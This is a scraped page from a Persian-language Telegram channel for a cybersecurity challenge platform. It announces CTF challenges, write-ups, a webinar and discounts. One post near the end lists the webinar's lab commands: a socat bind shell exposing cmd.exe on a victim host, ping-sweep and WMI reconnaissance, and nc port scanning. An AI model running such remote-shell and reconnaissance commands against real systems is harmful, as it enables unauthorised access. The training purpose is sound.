challenginno.ir
1.71K subscribers
290 photos
1 video
7 files
277 links
ارتقاء دانش و تخصص امنیت سایبری با دنیای حل چالش

@ENITP
Download Telegram
با سلام و عرض ادب خدمت همه دوستان و همراهان گرامی
با توجه به انجام برخی تغییرات در سرور از دقایقی دیگر سایت در دسترس نخواهد بود.

ضمن عرض پوزش بابت این موضوع، پس از اعمال تغییرات و در دسترس قرار گرفتن سرور اطلاع رسانی خدمت شما همراهان گرامی انجام خواهد شد.
✔️ یکی از موضوعاتی که باید در فرآیند تست نفوذ و تیم قرمز به آن توجه شود، بالا بردن سطح دسترسی یا Privilege Escalation است.


چالش موجود به یکی از تکنیک‌های مربوط به Privilege Escalation می‌پردازد که مربوط به پیکربندی نادرست در یکی از نرم افزارهای موجود در سیستم است.



🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/local-privilege-escalation
✔️ رایت آپ مربوط به چالش سرویس های آسیب پذیر - شماره دو هم اکنون در سایت قرار داده شد.

تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.


🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/initial-access-web-server
✔️ یک تیم عملیات آبی (Blue Team) مشکوک شده که در یکی از سیستم‌های ویندوز 10 (تارگت) تغییراتی برای ماندگاری (Persistence) ایجاد شده است.


شما به‌عنوان یک تحلیلگر امنیت یا شکارچی تهدید (Threat Hunter) وظیفه دارید با بررسی لاگ‌ها و فایل‌ها، متوجه شوید کدام فایل DLL اضافه شده و کدام کلید ریجستری مربوط به احراز هویت تغغیر کرده و یا کلیدی جدید اضافه شده است و در نهایت این حمله با کدام متد و تکنیک MITRE مطابقت دارد.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/threathunting
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود.

لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر نماییم.


💡 به پاس قدردانی از تمام دوستان گرامی هم اکنون کد تخفیف 60 درصدی بر روی کلیه محصولات وب سایت دنیای امنیت قابل دسترس می باشد.


🔸 به منظور استفاده از تخفیف مذکور می توانید به سایت دنیای امنیت مراجعه نموده و عبارت 100challenge را در بخش کد تخفیف وارد نمایید.


🔰 در انتها مجدد از همراهی شما دوستان گرامی کمال تشکر را داریم.


🔴 منتظر خبرهای بعدی ما در خصوص پلتفرم Challenginno باشید.


🌐 https://shop.securityworld.ir
✔️ در بررسی هایی که بر روی یک سیستم در شبکه انجام شده، مشخص گردیده که یک فایل بر روی آن سیستم اجرا شده است. این فایل در فرآیند تحقیقات، شناسایی و استخراج شده است.


شما باید ابتدا نحوه اجرا شدن و قرار گیری این فایل را شناسایی نموده و اجرای آن را اثبات نمایید. در ادامه باید با بررسی فایل اجرایی موجود، پروسسی که توسط این فایل فراخوانی و حذف شده است را نیز شناسایی نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/registry-analysis
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.


این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.


🔴 برای مشاهده چهارمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-4
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.


تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.


هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.


🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/incident-response-5
challenginno.ir
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود. لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر…
✔️ سلام و عرض ادب خدمت کلیه دوستان گرامی

تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.

🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.

🔰 ممنون از لطف و همراهی همه دوستان گرامی

🌐 https://shop.securityworld.ir
✔️ رایت آپ مربوط به چالش سرویس های آسیب پذیر - شماره سه هم اکنون در سایت قرار داده شد.

تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.


🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
✔️ در این چالش، شما با مجموعه‌ای از ترافیک شبکه مواجه هستید که شامل چند مرحله است.


داده‌های موجود در فایل PCAP نشان‌دهنده یک جریان ارتباطی هستند که شامل تبادل داده‌ها و یک فایل پیوست است.

وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/data-flow-analysis
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.

در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.


🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.

https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✔️ پروتکل HTTP یکی از مهم‌ترین پروتکل‌های اینترنتی است که به‌عنوان استانداردی برای انتقال داده‌ها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار می‌گیرد.


پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامه‌های وب است و درک دقیق آن برای شناسایی و بهره‌برداری از آسیب‌پذیری‌های امنیتی ضروری است.

در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✔️ یک تحلیل‌گر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش داده‌اند که فعالیت‌های غیرعادی مشاهده کرده‌اند، اما هیچ برنامه‌ای به طور واضح در حال اجرا نیست.


شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.


وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/memory-forensic
Forwarded from securityworld
PowerShell for Pentest-Final.pdf
2.7 MB
پاورشل به عنوان یک ابزار قدرتمند در سیستم‌عامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده می‌شود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.

📌 در این کتاب، به بررسی روش‌های مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمع‌آوری اطلاعات گرفته تا بهره‌برداری و Post-Exploitation، تکنیک‌هایی معرفی خواهند شد که به کارشناسان امنیت کمک می‌کنند تا نقاط ضعف شبکه‌ها و سیستم‌ها را شناسایی کرده و برای بهبود امنیت اقدام کنند.

🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخش‌هایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.

🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی

در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.

فیلم وبینار هم اکنون در دسترس دوستان می باشد.


🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید

🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time

`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
✔️ آسیب‌پذیری SQL Injection یکی از رایج‌ترین و خطرناک‌ترین نقاط ضعف امنیتی در برنامه‌های تحت وب است. این آسیب پذیری زمانی رخ می‌دهد که ورودی‌های کاربر به‌درستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئری‌های SQL استفاده شوند.


در این چالش سعی شده است که به آسیب‌پذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.


این جالش شامل دو مرحله اکسپلویت آسیب‌پذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.


🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:

🌐 https://challenginno.ir/challenge/no-sqli-njection